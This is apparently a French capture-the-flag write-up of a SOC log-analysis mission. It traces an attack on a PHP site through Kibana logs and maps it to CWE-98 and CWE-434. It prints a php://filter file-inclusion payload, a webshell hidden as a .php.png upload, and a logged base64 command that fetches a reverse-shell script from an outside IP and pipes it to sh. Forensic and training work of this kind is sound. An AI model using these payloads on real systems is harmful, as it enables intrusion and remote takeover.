Mission 2 - SOC

Mission 2 : SOC #

Dans cette deuxième mission, on nous fournit des logs sur Kibana pour analyser l’attaque d’un membre de NullVastation. Pour trouver le drapeau, il faudra concaténer :

  • Les CWE exploitées par l’attaquant.
  • L’adresse du serveur d’exfiltration utilisé par l’attaquant.
  • le chemin du fichier utilisé pour rendre l’exploit permanent.

Local File Inclusion #

On observe un pic d’activité, ce pic s’apparente à du fuzzing : l’attaquant essaye de truver une vulnérabilité dans le système. On peut supposer qu’à la fin de ce pic l’attaquant va exploiter la faille. On trouve alors la première exploitation :

/?lang=php://filter/read=convert.base64-encode&page=resource=db/connect

L’attaquant arrive ici à lire les informations de connexion et s’authentifie peu après sur la page d’administration.

Telechargement d’un reverse shell #

Après s’être authentifié, l’attaquant va téléverser du code php ev1L.php.png pour pouvoir exécuter des commandes sur la machine :

/admin-page/manage.php?success=true&path=upload/68af9111db3749e2e8af39e255fd874c/ev1L.php.png 

il va en suite télécharger un reverse shell via ce même script :

10.143.17.101 - - [28/Mar/2025:00:32:16 +0100] "GET /admin-page/upload/68af9111db3749e2e8af39e255fd874c/ev1L.php.png?cmd=echo+'d2dldCBodHRwOi8vMTYzLjE3Mi42Ny4yMDE6NDk5OTkvczFtcGwzLXIzdnNoM2xsLXZwcy5zaA=='|base64+-d|sh HTTP/1.1" 200 2144 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

Sachant qu’en base64 :

d2dldCBodHRwOi8vMTYzLjE3Mi42Ny4yMDE6NDk5OTkvczFtcGwzLXIzdnNoM2xsLXZwcy5zaA==
http://163.172.67.201:49999/s1mpl3-r3vsh3ll-vps.sh

On a alors tous nos éléments pour former notre drapeau :

  • CWE-98 : Improper Control of Filename
  • CWE-434 : Unrestricted Upload of File